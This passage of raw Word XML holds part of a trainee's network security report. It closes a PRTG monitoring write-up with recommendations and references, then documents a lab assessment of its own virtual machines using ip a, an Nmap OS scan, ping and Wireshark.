          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">To enhance security, I recommend the following measures aligned with industry standards (NIST 800-92, IEC 61511, and CIS benchmarks):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6"/>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Enable Role-Based Access Controls: Limiting access to the monitoring system and key resources per role ensures that only authorized personnel can modify or review sensitive data and settings.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7"/>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Baseline Traffic Patterns: Establishing a baseline for network traffic will improve anomaly detection accuracy, minimizing false positives from legitimate traffic fluctuations.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8"/>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Leverage Network Intrusion Detection Sensors: Adding intrusion detection sensors to monitor for known attack signatures and unusual behavior will provide another layer of security for both Windows and Linux systems.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39"/>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Regular Audits of Log Data: Consistent review of logs can preemptively identify weak points or attempted breaches. Combining this with Syslog sensors ensures detailed insights across systems.</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40"/>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Implement Automated Response Protocols: Integrating automated responses in PRTG will streamline incident response and reduce downtime. For example, automatically restarting services or blocking suspicious IPs when thresholds are exceeded can mitigate risks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">By deploying and calibrating these sensors in PRTG, Cat ensures efficient and secure operations within the client’s environment. This configuration balances performance and security, allowing Cat to focus on critical alerts without being overwhelmed by fal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">se positives. Following these recommendations, Big Dog can reduce risk, increase continuity, and maintain high standards of data integrity across its network, ensuring adherence to industry best practices.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="280" w:line="576" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="240" w:line="576" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Paessler AG. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">PRTG network monitor user manual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:tooltip="https://www.paessler.com/manuals/prtg" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.paessler.com/manuals/prtg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>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Kent, K., Souppaya, M., &amp; Johnson, T. (2006). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide to computer security log management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NIST Special Publication 800-92). National Institute of Standards and Technology. </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:tooltip="https://doi.org/10.6028/NIST.SP.800-92" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://doi.org/10.6028/NIST.SP.800-92</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>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International Society of Automation (ISA). (2004). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Functional safety: Safety instrumented systems for the process industry sector (IEC 61511)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. ISA.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="576" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Center for Internet Security. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CIS benchmarks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:tooltip="https://www.cisecurity.org/cis-benchmarks/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cisecurity.org/cis-benchmarks/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0" w:line="576" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId100" w:tooltip="https://attack.mitre.org/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Presentation link</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="576" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId101" w:tooltip="https://www.loom.com/share/00573c6ce1964715a5e31f7552556921?sid=59db38ff-091a-4e51-93c8-7baf489fe24b" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.loom.com/share/00573c6ce1964715a5e31f7552556921?sid=59db38ff-091a-4e51-93c8-7baf489fe24b</w:t>
        </w:r>
      </w:hyperlink>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720" w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Security Assessment Report</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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="40" w:before="80" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective:</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w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal of this analysis is to assess and document key device and network information using Nmap and Wireshark to ensure a clear understanding of the network’s configuration, vulnerabilities, and communication protocols. The ultimate objective is to recom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">mend improvements in network monitoring and security.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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology Documentation</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</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We utilized two primary tools for this assessment: Nmap for network mapping and open port detection, and Wireshark for packet capturing and analysis of network traffic. These tools allowed us to gain insights into each device’s security posture, communicat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ion patterns, and any vulnerabilities. Our primary focus was on identifying unsecured or vulnerable entry points, understanding device response times, and recommending improvements to optimize security and performance.</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Methodology</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Initiating and Setting Up the VM's :</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I initiated all virtual machines and had my Windows 11 VM as host to run Wireshark and capture network traffic through the Ethernet interface (eth0) and Nmap to conduct a detailed scan, identifying open ports and services.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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali OpenVAS and Linux Server VM's would be used assessed for vulnerabilities</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>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b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Collecting Device IP Addresses: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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I ran the command (ip a) on the terminal of Kali OpenVAS and Linux Server and on the command prompt of my Windows 11 VM to get to get their ip address.</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nmap &lt;IP Address&gt; -O, we determined the operating systems on Windows 11 and Linux Server VMs.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>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b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Verifying Network Connectivity:</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">From my Windows 11 VM, I confirmed all VMs were network-connected by pinging each IP, ensuring smooth communication</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>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b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Scanning with Nmap:</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b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap was used to identify open ports, operating systems, and network devices on the network.</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b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> We conducted a full scan of the network to document each device’s IP address, open ports, operating system, and latency. Key findings included identifying the Windows 11 device with an open HTTP port, a common vulnerability.</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664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>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b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Traffic Analysis with Wireshark:</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720"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireshark enabled a detailed examination of packets moving through the network, helping us detect any suspicious activity, measure response times, and monitor device communication protocols.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> We captured packets on the network, focusing on the Windows 11 desktop’s HTTP communication. Wireshark also allowed us to analyze latency, which revealed the high ARP Ping time, signaling potential network bottlenecks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="3371850" cy="298132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4884" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId102"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3371850" cy="29813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265.50pt;height:234.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId102"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w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig.1 Nmap Scan on Kali OpenVas VM</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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="3276600" cy="2857500"/>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1308" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId103"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3276599" cy="2857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258.00pt;height:225.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId103"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w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 2 Nmap scan on Kali OpenVas VM</w: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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="3971925" cy="294322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96505" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId104"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3971925" cy="29432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312.75pt;height:231.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId104" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
